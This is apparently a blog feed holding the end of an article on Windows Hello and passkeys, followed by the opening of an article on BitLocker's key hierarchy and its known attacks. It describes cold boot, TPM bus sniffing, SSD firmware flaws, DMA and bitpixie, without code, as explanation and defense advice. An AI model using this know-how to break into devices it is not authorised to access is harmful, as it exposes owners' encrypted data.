&lt;p&gt;For password migration, avoid a flag day. Keep passwords as break-glass recovery while you move device sign-in, Microsoft 365, VPN, and high-value internal apps onto Hello or passkeys first [@ms-entra-passwordless]. Measure enrollment completion, recovery success, and hardware exceptions. Once those numbers stabilize, tighten Conditional Access so phishing-resistant credentials satisfy MFA and passwords become the fallback of last resort.&lt;/p&gt;
&lt;p&gt;After 64 years, the password is finally losing its grip. But the story of Windows Hello is not a triumph -- it is a lesson in the limits of security engineering.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Limits: What Remains Unsolved&lt;/h2&gt;
&lt;p&gt;Biometrics fail in a way passwords do not: they are hard to rotate.&lt;/p&gt;

You cannot change your face. This single fact defines the deepest unsolved problem in biometric authentication.
&lt;p&gt;Passwords can be rotated. Security keys can be replaced. But you have one face, ten fingerprints, and two irises. If a biometric template is compromised, there is no &quot;reset&quot; button.&lt;/p&gt;

A technique for generating revocable biometric templates by applying non-invertible mathematical transformations to the original biometric data. If a transformed template is compromised, a new transformation can be applied to create a fresh template from the same biometric trait. In theory, this solves the irrevocability problem. In practice, the trade-off between non-invertibility and matching accuracy remains unresolved.
&lt;h3&gt;The biometric floor&lt;/h3&gt;
&lt;p&gt;The theoretical limit on biometric authentication error is the Bayes error rate [@jain-biometric] -- the minimum achievable error when the genuine-user and impostor score distributions overlap. Per information theory, the error probability is bounded by Fano&apos;s inequality:&lt;/p&gt;
&lt;p&gt;$$P_e \geq \frac{H(X|Y) - 1}{\log |X|}$$&lt;/p&gt;
&lt;p&gt;where $P_e$ is the probability of error, $H(X|Y)$ is the conditional entropy of identity given the biometric sample, and $|X|$ is the number of possible identities. Current systems achieve a FAR of $10^{-5}$ to $10^{-6}$, but the theoretical minimum [@jain-biometric] -- given perfect sensors and optimal classifiers -- could be orders of magnitude lower. The practical gap is driven by sensor noise, environmental variability, and aging of biometric features.&lt;/p&gt;
&lt;h3&gt;Five open problems&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;1. Cross-platform credential portability.&lt;/strong&gt; Passkeys are currently vendor-locked. An Apple passkey does not transfer to a Google account. The FIDO Alliance published draft CXP/CXF specifications [@fido-cxp] in late 2024 for encrypted credential exchange, but full cross-vendor interoperability is not expected before late 2026.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. The adversarial ML arms race.&lt;/strong&gt; Generative AI can create increasingly convincing biometric spoofs -- the Red Bleed attack [@red-bleed] used a VAE to convert RGB photos to NIR facial videos. Discriminative AI tries to detect these spoofs. This is an open-ended arms race with no known endpoint.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Account recovery.&lt;/strong&gt; When all biometric and device-based credentials fail, how does a user recover their account? Most services fall back to email or SMS [@ms-entra-passwordless] -- reintroducing the very phishable factors they were designed to eliminate. Recovery codes are functionally passwords.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Systems that fall back to passwords or SMS for account recovery reintroduce the very vulnerabilities they were designed to eliminate. A truly passwordless system needs passwordless recovery -- and no universal solution exists yet.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;4. The quantum threat.&lt;/strong&gt; Shor&apos;s algorithm [@nist-pqc] on a sufficiently large quantum computer would break all ECDSA and RSA authentication -- including every FIDO2 credential in existence. NIST finalized post-quantum standards [@nist-pqc] (ML-DSA, SLH-DSA, ML-KEM) in 2024, but no FIDO2 authenticator ships with post-quantum support as of 2026.&lt;/p&gt;

All current FIDO2/WebAuthn authentication uses ECDSA P-256, which provides 128-bit classical security. Breaking a single credential requires approximately $2^{128}$ operations -- far beyond any existing computer.&lt;p&gt;Shor&apos;s algorithm changes this equation. A cryptographically relevant quantum computer could factor the elliptic curve discrete logarithm problem in polynomial time, breaking ECDSA entirely. No such computer exists today, but the &quot;harvest now, decrypt later&quot; threat means adversaries may be collecting signed assertions now to verify forged credentials later.&lt;/p&gt;
&lt;p&gt;NIST finalized its first post-quantum cryptography standards in 2024 [@nist-pqc]: ML-DSA (formerly CRYSTALS-Dilithium) for signatures, ML-KEM (formerly CRYSTALS-Kyber) for key encapsulation, and SLH-DSA (formerly SPHINCS+) for hash-based signatures. The FIDO Alliance and W3C are exploring hybrid signature schemes that combine classical ECDSA with post-quantum algorithms, but no timeline for standardization has been published.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. The ESS hardware gap.&lt;/strong&gt; ESS requires specific secure sensors and VBS-capable CPUs [@ms-ess]. Many enterprise PCs -- particularly those shipped without an ESS-certified built-in biometric sensor, including many AMD-based and older Intel-based machines -- lack ESS capability. On these devices, Windows Hello falls back to the pre-ESS security model, leaving them vulnerable to attacks like Faceplant.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. Accessibility and inclusion.&lt;/strong&gt; Biometric authentication creates barriers for people with facial differences, missing fingers, or conditions that affect biometric stability. A passwordless future must ensure that non-biometric alternatives (PINs, hardware keys) remain first-class options, not afterthoughts. Behavioral biometrics -- keystroke dynamics, gait analysis, continuous session verification -- represent an emerging parallel path that may expand authentication options beyond traditional biometric modalities.&lt;/p&gt;

Open PowerShell as administrator and run:&lt;pre&gt;&lt;code&gt;Get-CimInstance -Namespace root/Microsoft/Windows/DeviceGuard -ClassName Win32_DeviceGuard | Select-Object VirtualizationBasedSecurityStatus
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A value of &lt;code&gt;2&lt;/code&gt; means VBS is running. Then check the biometric service:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Get-WinEvent -LogName Microsoft-Windows-Biometrics/Operational -MaxEvents 10 | Format-List
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Look for events indicating ESS-protected biometric operations. If your device lacks ESS, consider disabling biometric sign-in on sensitive accounts and using FIDO2 hardware keys instead.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Biometric traits are permanent and finite. Unlike passwords, they cannot be changed if compromised. This irrevocability is the deepest unsolved challenge in passwordless authentication -- and no amount of better sensors or smarter algorithms can change the fact that you have one face, ten fingerprints, and two irises.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The theoretically ideal system would combine zero-knowledge biometric verification, post-quantum cryptographic authentication, hardware-attested revocable credentials, and cross-platform portability. None of this exists yet.&lt;/p&gt;
&lt;p&gt;The password&apos;s 64-year reign is ending, but its replacement is still under construction. Every generation of authentication solved one problem and revealed a deeper one. The question is not whether passwordless authentication will win -- it is whether we can build it before the attackers catch up.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Frequently Asked Questions&lt;/h2&gt;

No. Biometric data never leaves the device. During enrollment, your face or fingerprint template is stored locally, protected by the operating system (and by VBS on ESS-enabled devices). Only a public key is registered with the identity provider (Azure AD / Entra ID) [@ms-whfb]. Microsoft&apos;s servers never receive, store, or process your biometric data.

Standard photos cannot. Windows Hello uses near-infrared cameras [@ms-biometric-reqs] with anti-spoofing algorithms that distinguish between live faces and flat images. However, researchers have demonstrated advanced attacks: CVE-2021-34466 [@cyberark-bypass] used a custom USB device emulating an IR camera, and the Red Bleed attack [@red-bleed] used a custom NIR-emitting LCD display. Both have been patched, but the arms race continues.

No -- it is more secure. A Windows Hello PIN is device-bound [@ms-whfb]: it unlocks a TPM-stored private key on that specific hardware. A stolen PIN is useless without physical access to the device. A password, by contrast, works from any device on earth and can be phished, reused, or leaked in a breach.

Consumer Windows Hello [@ms-whfb] ties authentication to a personal Microsoft account. Windows Hello for Business integrates with Azure AD / Entra ID with enterprise management capabilities: conditional access policies, Intune deployment, multiple trust models (cloud, key, certificate), and group policy controls. They share the same biometric and TPM technology but have different management and security models.

No. Passkeys build on Hello&apos;s foundation. Windows Hello acts as the platform authenticator for FIDO2 passkeys [@fido-how] on Windows -- your biometric gesture unlocks the passkey stored in the TPM. Passkeys extend Hello&apos;s model to cross-platform and cross-service authentication via the WebAuthn standard [@webauthn-3].

With device-bound credentials (traditional Windows Hello), you re-enroll on the new device using your Microsoft or organizational account. With synced passkeys, credentials restore from your credential manager -- iCloud Keychain [@apple-passkeys-security] for Apple, Google Password Manager [@google-passkeys] for Android/Chrome. Registering a FIDO2 hardware security key [@fido-specs] as a backup authenticator is strongly recommended.

Not indefinitely. The asymmetric cryptography underlying Hello and FIDO2 (ECDSA P-256) is theoretically vulnerable [@nist-pqc] to quantum computers running Shor&apos;s algorithm. No quantum computer can break it today, and the timeline for cryptographically relevant quantum computers remains uncertain. NIST finalized post-quantum cryptography standards in 2024, but no FIDO2 authenticator ships with post-quantum support yet. Migration planning should begin now.
&lt;hr /&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-hello-revolution&quot; keyTerms={[
  { term: &quot;TPM&quot;, definition: &quot;Trusted Platform Module -- hardware chip that generates and stores cryptographic keys&quot; },
  { term: &quot;Asymmetric cryptography&quot;, definition: &quot;Public-key/private-key system where data signed with one key is verified with the other&quot; },
  { term: &quot;FAR&quot;, definition: &quot;False Acceptance Rate -- probability a biometric system accepts an unauthorized person&quot; },
  { term: &quot;NIR&quot;, definition: &quot;Near-infrared imaging -- camera technology used by Windows Hello for anti-spoofing&quot; },
  { term: &quot;WebAuthn&quot;, definition: &quot;W3C standard browser API for public-key-based authentication&quot; },
  { term: &quot;VBS&quot;, definition: &quot;Virtualization-Based Security -- hypervisor isolation for secure processing&quot; },
  { term: &quot;ESS&quot;, definition: &quot;Enhanced Sign-in Security -- VBS-isolated biometric matching in Windows 11&quot; },
  { term: &quot;Passkey&quot;, definition: &quot;FIDO2 credential that can be synced across devices via credential managers&quot; },
  { term: &quot;FIDO2&quot;, definition: &quot;Industry standard for passwordless authentication (WebAuthn + CTAP)&quot; },
  { term: &quot;Cancelable biometrics&quot;, definition: &quot;Revocable biometric templates using non-invertible transformations&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-hello</category><category>authentication</category><category>biometrics</category><category>fido2</category><category>passkeys</category><category>security</category><category>tpm</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>BitLocker on Windows: Architecture, Attacks, and the Limits of Full-Disk Encryption</title><link>https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/</link><guid isPermaLink="true">https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/</guid><description>How BitLocker evolved from an optional enterprise feature to encryption-by-default, its cryptographic architecture, every known attack, and what FDE still cannot protect against.</description><pubDate>Sun, 26 Apr 2026 00:00:00 GMT</pubDate><content:encoded>
**Windows 11 now encrypts your drive with BitLocker by default -- no action required.** The encryption itself (XTS-AES) is solid, but the default TPM-only configuration is vulnerable to physical attacks costing as little as \$5 in hardware. For real security, add a pre-boot PIN, verify software encryption is enforced, and know where your recovery key is stored. This article traces BitLocker&apos;s 20-year evolution from an optional enterprise feature to encryption-by-default, explains its cryptographic architecture, catalogs every known attack, and compares it to VeraCrypt, LUKS, and FileVault.
&lt;h2&gt;Your Laptop Is Already Encrypted&lt;/h2&gt;
&lt;p&gt;Your Windows laptop is almost certainly encrypting every sector of its drive right now -- and you probably never turned that on. Since late 2024, every clean install of Windows 11 activates BitLocker by default, silently encrypting the entire volume and uploading a recovery key to Microsoft&apos;s cloud [@computerworld-24h2]. This is the culmination of a 20-year engineering effort that began with a stolen laptop containing 26.5 million veterans&apos; medical records.&lt;/p&gt;
&lt;p&gt;In May 2006, an employee of the U.S. Department of Veterans Affairs took home a laptop and an external hard drive containing the personal data of 26.5 million veterans and active-duty military personnel. Both were stolen from his home. The data was not encrypted. The breach later resulted in a $20 million class-action settlement and became the defining example of why laptops need full-disk encryption [@ms-bitlocker].&lt;/p&gt;
&lt;p&gt;That event accelerated a shift already underway inside Microsoft: from &quot;encryption is something you turn on&quot; to &quot;encryption is something that&apos;s always there.&quot; Today, the 24H2 update means every new Windows 11 installation has BitLocker active with no user action [@computerworld-24h2]. On Windows Home editions, this takes the form of Device Encryption -- a streamlined subset of BitLocker without Group Policy control or configurable pre-boot PIN.&lt;/p&gt;
&lt;p&gt;But here is the tension at the heart of this story. BitLocker encrypts everything by default, yet security researchers keep finding ways past it -- with a $5 chip, a network cable, or a can of compressed air. If your drive is encrypted, why should you care?&lt;/p&gt;
&lt;p&gt;The answer lies in how the keys are managed. And that story starts 25 years ago.&lt;/p&gt;
&lt;h2&gt;Before BitLocker: File-Level Encryption and Its Fatal Flaw&lt;/h2&gt;
&lt;p&gt;Before BitLocker, Windows had encryption. The Encrypting File System (EFS) shipped with Windows 2000 in 1999, and it encrypted individual files beautifully [@ms-efs]. So why wasn&apos;t that enough?&lt;/p&gt;

A file-level encryption feature built into NTFS since Windows 2000. EFS encrypts individual files using a randomly generated File Encryption Key (FEK), which is then wrapped with the user&apos;s RSA public key certificate. Decryption is transparent while the user is logged in.
&lt;p&gt;EFS worked at the NTFS layer. Each file got its own symmetric key (DESX by default in Windows 2000; AES became the default EFS cipher in Windows XP SP1 and Windows Server 2003), wrapped with the user&apos;s public key and stored in a special NTFS attribute. When you were logged in, decryption happened transparently [@ms-efs].&lt;/p&gt;
&lt;p&gt;The problem was where it didn&apos;t go. EFS encrypts files and folders -- not volumes. The operating system itself, the page file, the hibernation file, the temp directory -- all of that remained in plaintext. An attacker who booted from a USB stick could read the Windows directory, extract cached credentials from the SAM and SECURITY registry hives, and access fragments of &quot;encrypted&quot; files that the OS had swapped to disk [@ms-bitlocker].&lt;/p&gt;
&lt;p&gt;The failure mode was concrete: steal a laptop, mount the drive on another machine, and everything the OS touched is readable. EFS protected the documents you remembered to encrypt. It did nothing for the thousands of files the OS created on your behalf.
Microsoft also explored a far more ambitious approach. The &quot;Next-Generation Secure Computing Base&quot; (NGSCB), originally codenamed Palladium, proposed a hardware-rooted secure computing environment -- a tamper-resistant &quot;nexus&quot; running alongside Windows. Announced in 2002 under Peter Biddle&apos;s leadership, the full vision was scaled back around 2004-2005 under a wave of industry resistance and public backlash over DRM fears. But its core idea -- a Trusted Platform Module providing hardware-rooted key storage -- survived and became BitLocker&apos;s anchor [@ngscb-wiki].&lt;/p&gt;

A dedicated hardware chip (or firmware module) that provides cryptographic key storage, platform integrity measurement, and sealed storage. The TPM can &quot;seal&quot; a secret to specific Platform Configuration Register (PCR) values, releasing it only when the boot chain matches the expected measurements. Standardized by the Trusted Computing Group (TCG), first as TPM 1.2 and later TPM 2.0.
&lt;p&gt;Microsoft needed something that encrypted &lt;em&gt;everything&lt;/em&gt; on the disk -- the OS, the swap file, the hibernation file, the temp files, all of it. But who would design the cipher, and how would the keys be protected without making the user type a 48-character password at every boot?&lt;/p&gt;
&lt;h2&gt;The Architecture: How BitLocker Actually Works&lt;/h2&gt;
&lt;p&gt;In 2006, a Dutch cryptographer named Niels Ferguson published a paper describing a new disk encryption scheme [@ferguson-2006]. Two decades later, the core architecture he designed is still running on hundreds of millions of machines -- structurally unchanged.&lt;/p&gt;
&lt;h3&gt;The Three-Layer Key Hierarchy&lt;/h3&gt;
&lt;p&gt;BitLocker&apos;s design centers on a three-layer key hierarchy that solves an otherwise painful problem: how do you let a user change their password without re-encrypting an entire 2 TB drive?&lt;/p&gt;

The symmetric key that directly encrypts and decrypts disk sectors. In XTS-AES-256 mode, this is effectively two 256-bit AES keys -- one for block encryption, one for the XTS &quot;tweak&quot; computation that ensures identical plaintext at different sector locations produces different ciphertext.

A key-encrypting key that wraps the FVEK. The VMK itself is encrypted by one or more key protectors. This indirection allows changing authentication methods (adding a PIN, rotating a recovery key) without re-encrypting the entire volume -- only the VMK wrapping changes.

An authentication mechanism that independently encrypts the VMK. Common protectors include TPM-only (VMK sealed to Platform Configuration Registers), TPM+PIN (adds a user-supplied PIN), and Recovery Password (a 48-digit numerical backup code). Multiple protectors can coexist on the same volume.
&lt;p&gt;The indirection is the key insight. Your data is encrypted with the FVEK. The FVEK is wrapped by the VMK. The VMK is wrapped by one or more key protectors -- your TPM, your PIN, your recovery password. When you change your PIN, only the VMK wrapper changes. The FVEK stays the same. The entire volume never needs re-encryption [@ms-bitlocker].&lt;/p&gt;

flowchart TD
    A[&quot;Disk Sectors&lt;br /&gt;(encrypted data)&quot;] --&amp;gt;|&quot;decrypted by&quot;| B[&quot;FVEK&lt;br /&gt;(Full Volume Encryption Key)&quot;]
    B --&amp;gt;|&quot;wrapped by&quot;| C[&quot;VMK&lt;br /&gt;(Volume Master Key)&quot;]
    C --&amp;gt;|&quot;protected by&quot;| D[&quot;TPM-Only&lt;br /&gt;Protector&quot;]
    C --&amp;gt;|&quot;protected by&quot;| E[&quot;TPM+PIN&lt;br /&gt;Protector&quot;]
    C --&amp;gt;|&quot;protected by&quot;| F[&quot;Recovery Password&lt;br /&gt;(48-digit)&quot;]
    C --&amp;gt;|&quot;protected by&quot;| G[&quot;Recovery Key&lt;br /&gt;(file/cloud escrow)&quot;]
&lt;h3&gt;TPM Sealing: The Hardware Root of Trust&lt;/h3&gt;
&lt;p&gt;At boot time, the TPM measures each component of the boot chain -- firmware, bootloader, boot configuration -- and records hashes in its Platform Configuration Registers (PCRs). During BitLocker setup, the TPM seals the VMK to the current PCR values. On every subsequent boot, the TPM re-measures the chain. If the measurements match, the TPM releases the VMK. If anything has changed -- a modified bootloader, a BIOS update, a different boot device -- the TPM refuses, and the user must provide a recovery key [@ms-bitlocker].&lt;/p&gt;

A register inside the TPM that stores a hash representing the state of a specific component of the boot chain (firmware, bootloader, OS kernel, etc.). PCR values are &quot;extended&quot; at each boot step -- the new measurement is hashed together with the previous value, creating a tamper-evident chain. BitLocker seals the VMK to specific PCR values so that any modification to the boot process blocks key release.

sequenceDiagram
    participant UEFI as UEFI Firmware
    participant TPM as TPM Chip
    participant BL as Windows Boot Manager
    participant OS as Windows OS
    UEFI-&amp;gt;&amp;gt;TPM: Extend PCR 0-7 (firmware measurements)
    BL-&amp;gt;&amp;gt;TPM: Extend PCR 8-11 (bootloader measurements)
    BL-&amp;gt;&amp;gt;TPM: Request VMK unseal
    alt PCR values match sealed state
        TPM-&amp;gt;&amp;gt;BL: Release VMK (cleartext)
        BL-&amp;gt;&amp;gt;OS: Decrypt FVEK, mount volume
    else PCR mismatch (tampered boot chain)
        TPM-&amp;gt;&amp;gt;BL: Refuse unseal
        BL-&amp;gt;&amp;gt;OS: Prompt for recovery key
    end
&lt;p&gt;Ferguson&apos;s Elephant diffuser served BitLocker well from Vista through Windows 7, but it was a custom, non-standard construction. Government compliance frameworks (FIPS 140-2) and the emerging IEEE 1619 standard required a published, peer-reviewed cipher mode [@nist-800-38e].
Ferguson&apos;s original 2006 design used AES-128 in CBC mode with a custom &quot;Elephant&quot; diffuser -- a two-pass diffusion algorithm (one pass forward, one pass backward) applied to each 512-byte sector. The Elephant diffuser ensured that flipping one bit of ciphertext would scramble the entire sector of plaintext, raising the bar for sector manipulation attacks. The name was reportedly a nod to the animal&apos;s famously long memory -- a reference to diffusion spreading changes across the entire sector.&lt;/p&gt;

The removal of the Elephant diffuser in Windows 8 was controversial. Microsoft cited FIPS 140-2 certification requirements and alignment with standardized disk-encryption modes as the primary motivations. Windows 8 kept AES-CBC but removed the proprietary whole-sector diffuser; Windows 10 version 1511 later moved new volumes to XTS-AES. Critics pointed out that both post-Elephant designs lost the diffuser&apos;s whole-sector avalanche behavior. Microsoft chose standards compliance over a proprietary advantage -- a pragmatic decision that made BitLocker deployable in regulated environments worldwide [@ms-bitlocker].
&lt;p&gt;Windows 10 version 1511 (November 2015) completed the transition by making XTS-AES-128 the default for new volumes, with XTS-AES-256 available via Group Policy [@ms-bitlocker]. XTS stands for XEX-based Tweaked-codebook mode with ciphertext Stealing, built on Rogaway&apos;s XEX (XOR-Encrypt-XOR) construction [@rogaway-2004]. The core XEX pattern works like this: each sector gets a unique &quot;tweak&quot; derived from its sector number, and each 16-byte block within that sector is XORed with the tweak, AES-encrypted, then XORed with the tweak again. XTS extends XEX by adding ciphertext stealing to handle sectors that are not an exact multiple of 16 bytes. The result: identical plaintext at different disk locations produces different ciphertext, and there is no IV management problem like CBC had [@nist-800-38e].&lt;/p&gt;

flowchart LR
    SN[&quot;Sector Number&quot;] --&amp;gt; TW[&quot;Tweak Generation&lt;br /&gt;(AES encrypt sector #&lt;br /&gt;with tweak key)&quot;]
    TW --&amp;gt; X1a[&quot;XOR with&lt;br /&gt;Tweak&quot;]
    TW --&amp;gt; X2a[&quot;XOR with&lt;br /&gt;Tweak&quot;]
    TW --&amp;gt; XNa[&quot;XOR with&lt;br /&gt;Tweak&quot;]
    P1[&quot;Plaintext&lt;br /&gt;Block 1&quot;] --&amp;gt; X1a --&amp;gt; AES1[&quot;AES Encrypt&quot;] --&amp;gt; X1b[&quot;XOR with&lt;br /&gt;Tweak&quot;] --&amp;gt; C1[&quot;Ciphertext&lt;br /&gt;Block 1&quot;]
    P2[&quot;Plaintext&lt;br /&gt;Block 2&quot;] --&amp;gt; X2a --&amp;gt; AES2[&quot;AES Encrypt&quot;] --&amp;gt; X2b[&quot;XOR with&lt;br /&gt;Tweak&quot;] --&amp;gt; C2[&quot;Ciphertext&lt;br /&gt;Block 2&quot;]
    PN[&quot;Plaintext&lt;br /&gt;Block N&quot;] --&amp;gt; XNa --&amp;gt; AESN[&quot;AES Encrypt&quot;] --&amp;gt; XNb[&quot;XOR with&lt;br /&gt;Tweak&quot;] --&amp;gt; CN[&quot;Ciphertext&lt;br /&gt;Block N&quot;]
&lt;p&gt;This architecture is elegant. The TPM releases the key automatically at boot if nothing has changed. The key hierarchy means operational changes (new PIN, new recovery key) never touch the encrypted data. The cipher mode is standardized, hardware-accelerated via AES-NI on virtually all modern CPUs [@intel-aesni], and FIPS-validated.&lt;/p&gt;
&lt;p&gt;But what happens if an attacker gets to the hardware? Princeton researchers were about to find out.&lt;/p&gt;
&lt;h2&gt;The Cold Wake-Up Call: Attacks That Changed Everything&lt;/h2&gt;
&lt;p&gt;In 2008, a team at Princeton did something unsettling. They sprayed a laptop&apos;s RAM with compressed air, yanked the power cord, and recovered the BitLocker encryption key from the memory that should have been erased. It wasn&apos;t [@halderman-2008].&lt;/p&gt;

A physical attack exploiting the fact that DRAM retains its contents for seconds to minutes after power loss (a property called &quot;data remanence&quot;). By cooling RAM to extend retention time and quickly rebooting into an attacker-controlled OS, encryption keys can be extracted from residual memory contents. First demonstrated against BitLocker, FileVault, and dm-crypt by Halderman et al. at Princeton in 2008.
&lt;p&gt;J. Alex Halderman and his team demonstrated that DRAM does not instantly lose its contents when power is removed. At room temperature, data decays over seconds. Cooled with compressed air (around -50C), retention extends to minutes. That is enough time to reboot into a USB-based attack environment, scan memory for AES key schedules, and extract the FVEK [@halderman-2008].&lt;/p&gt;

DRAM retains its contents for seconds to minutes after power loss... enough time to extract full encryption keys. -- Halderman et al., 2008, adapted from the paper&apos;s findings.
&lt;p&gt;The cold boot attack revealed a fundamental truth about every full-disk encryption system: the keys must live in RAM while the OS is running. There is no way around this. Encrypt the keys in memory and you need a key to decrypt &lt;em&gt;those&lt;/em&gt; keys -- turtles all the way down. The cold boot paper did not just break BitLocker; it defined the boundary of what FDE can and cannot do.&lt;/p&gt;
&lt;h3&gt;The $5 Chip That Reads Your Encryption Key&lt;/h3&gt;
&lt;p&gt;In 2019, Denis Andzakovic at Pulse Security demonstrated something even more unsettling: in BitLocker&apos;s default TPM-only configuration, the VMK travels in cleartext on the communication bus (SPI or LPC, depending on hardware) between the discrete TPM chip and the CPU [@andzakovic-2019]. A $40 NZD FPGA, clipped to the right pins, captured the VMK during boot. The drive was decrypted offline in under five minutes.&lt;/p&gt;

sequenceDiagram
    participant CPU as CPU
    participant SPI as SPI / LPC Bus
    participant TPM as Discrete TPM
    participant ATK as Attacker (logic analyzer)
    Note over CPU,TPM: Normal boot sequence
    CPU-&amp;gt;&amp;gt;SPI: Request VMK unseal
    SPI-&amp;gt;&amp;gt;TPM: Forward request
    TPM-&amp;gt;&amp;gt;SPI: Return VMK (cleartext!)
    ATK-&amp;gt;&amp;gt;SPI: Sniff VMK from bus traffic
    SPI-&amp;gt;&amp;gt;CPU: Deliver VMK
    Note over ATK: Attacker now has VMK -- Drive can be decrypted offline
&lt;p&gt;The SCRT security team independently reproduced this attack in 2021 [@scrt-tpm-2021], and by 2024, the community had replaced the FPGA with a $5 Raspberry Pi Pico [@tpm-sniffing-repo]. Compass Security documented successful attacks on Lenovo ThinkPad, HP EliteBook, and Microsoft Surface models -- the most common enterprise laptops [@compass-bypasses].
The $40 FPGA that Andzakovic used in 2019 has since been replaced by a $5 Raspberry Pi Pico in community tooling. The TPM-Sniffing repository on GitHub maintains a list of tested laptop models and TPM chips, with specific pinout diagrams for each.&lt;/p&gt;
&lt;p&gt;Even adding a TPM+PIN does not fully close this gap. In October 2024, SCRT Security demonstrated that if an attacker knows (or coerces) the PIN, the VMK can still be extracted via SPI bus sniffing [@scrt-tpm-pin-2024]. The real mitigation is a firmware TPM (fTPM, integrated into the CPU) -- when the TPM is on the same die as the processor, there is no external bus to sniff.&lt;/p&gt;
&lt;h3&gt;The SSD Betrayal&lt;/h3&gt;
&lt;p&gt;In 2019, Carlo Meijer and Bernard van Gastel at Radboud University published findings that shocked the storage industry. Multiple popular SSDs from Samsung and Critical had critically flawed hardware encryption. In some cases, the data encryption key was stored in plaintext on the drive. In others, the user&apos;s password was never actually used for key derivation [@meijer-2019].&lt;/p&gt;

Multiple popular SSDs had critically flawed hardware encryption -- in some cases, the data encryption key was stored in plaintext or could be recovered by manipulating firmware. -- Meijer and van Gastel, 2019, summarizing their IEEE S&amp;amp;P findings.

This was not a theoretical weakness. BitLocker&apos;s &quot;eDrive&quot; mode trusted SSD firmware to perform encryption. On a Samsung 850 EVO or Critical MX300 with eDrive enabled, BitLocker reported the drive as &quot;encrypted&quot; -- but an attacker with physical access could use JTAG debugging or firmware manipulation to read all data in plaintext. The data was never actually encrypted by the hardware [@meijer-2019]. Microsoft issued Security Advisory ADV180028 in November 2018, recommending administrators enforce software encryption, and later changed the default so BitLocker no longer trusts hardware encryption [@adv180028].
&lt;h3&gt;DMA and Bitpixie: The Attacks Keep Coming&lt;/h3&gt;
&lt;p&gt;Ulf Frisk&apos;s PCILeech tool (2016) turned DMA attacks into a scriptable operation. Any system with unprotected Thunderbolt, ExpressCard, or PCIe slots was vulnerable to direct memory reads while powered on or in sleep mode [@pcileech]. Björn Ruytenberg&apos;s Thunderspy research (2020) found seven vulnerabilities in Intel&apos;s Thunderbolt protocol that enabled evil-maid DMA attacks bypassing disk encryption and screen locks. Microsoft introduced Kernel DMA Protection in Windows 10 version 1803, using IOMMU to block unauthorized DMA from external Thunderbolt and PCIe devices -- closing this vector on supported hardware [@ms-kernel-dma].&lt;/p&gt;
&lt;p&gt;And in 2023, the &quot;bitpixie&quot; vulnerability (CVE-2023-21563) introduced a purely software-based bypass. An attacker with physical access triggers a PXE network boot, which performs a soft reboot -- leaving the VMK in RAM. The attacker boots into a Linux environment (or, in newer variants using the WinPE approach, a custom Windows PE image that avoids Secure Boot restrictions on third-party Linux loaders), scans memory, and extracts the VMK. The entire attack takes about five minutes and requires no hardware modifications [@cve-2023-21563].&lt;/p&gt;
&lt;p&gt;Each attack reinforced the same lesson: full-disk encryption only protects data at rest. The default TPM-only configuration was never designed to resist a determined attacker with physical access. So how did Microsoft respond?&lt;/p&gt;
&lt;h2&gt;The Evolution: Generation by Generation&lt;/h2&gt;
&lt;p&gt;What makes BitLocker&apos;s history unusual is that each generation was a direct response to a specific failure. The evolution was not planned from the start -- it was forced by attackers.&lt;/p&gt;

flowchart TD
    G0[&quot;Gen 0: EFS (2000)&lt;br /&gt;File-level encryption&quot;] --&amp;gt;|&quot;OS/swap/temp left exposed&quot;| G1[&quot;Gen 1: Vista BitLocker (2006)&lt;br /&gt;AES-CBC + Elephant diffuser&quot;]
    G1 --&amp;gt;|&quot;OS drive only; non-standard cipher&quot;| G2[&quot;Gen 2: Win 7 (2009)&lt;br /&gt;+ BitLocker To Go&quot;]
    G2 --&amp;gt;|&quot;Elephant blocks FIPS/IEEE compliance&quot;| G3[&quot;Gen 3: Win 8/8.1 (2012-2013)&lt;br /&gt;No Elephant + eDrive + Device Encryption&quot;]
    G3 --&amp;gt;|&quot;SSD hardware encryption broken (2018)&quot;| G4[&quot;Gen 4: Win 10 (2015-2021)&lt;br /&gt;Software-first + cloud management&quot;]
    G4 --&amp;gt;|&quot;Still not default for consumers&quot;| G5[&quot;Gen 5: Win 11 24H2 (2024)&lt;br /&gt;Encryption by default&quot;]
&lt;p&gt;&lt;strong&gt;Generation 0 -- EFS (2000):&lt;/strong&gt; File-level encryption on NTFS. Left the OS, swap, and temp files exposed. Superseded because volume-level encryption was needed [@ms-efs].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 1 -- Vista (2006):&lt;/strong&gt; Ferguson&apos;s AES-CBC + Elephant diffuser. First volume-level encryption in Windows. OS drive only. The cold boot attack (2008) revealed that FDE keys in RAM are vulnerable [@ferguson-2006, @halderman-2008].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 2 -- Windows 7 (2009):&lt;/strong&gt; Added BitLocker To Go for USB drives and data volumes. The 2006 VA breach had involved a stolen external hard drive, making removable media encryption urgent. The Elephant diffuser persisted, blocking compliance certification [@ms-bitlocker].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 3 -- Windows 8/8.1 (2012-2013):&lt;/strong&gt; Removed the Elephant diffuser while retaining AES-CBC, introduced eDrive hardware offload in Windows 8, and added consumer Device Encryption in Windows 8.1. The SSD betrayal (2018) destroyed the eDrive trust model [@ms-bitlocker, @meijer-2019].&lt;/p&gt;
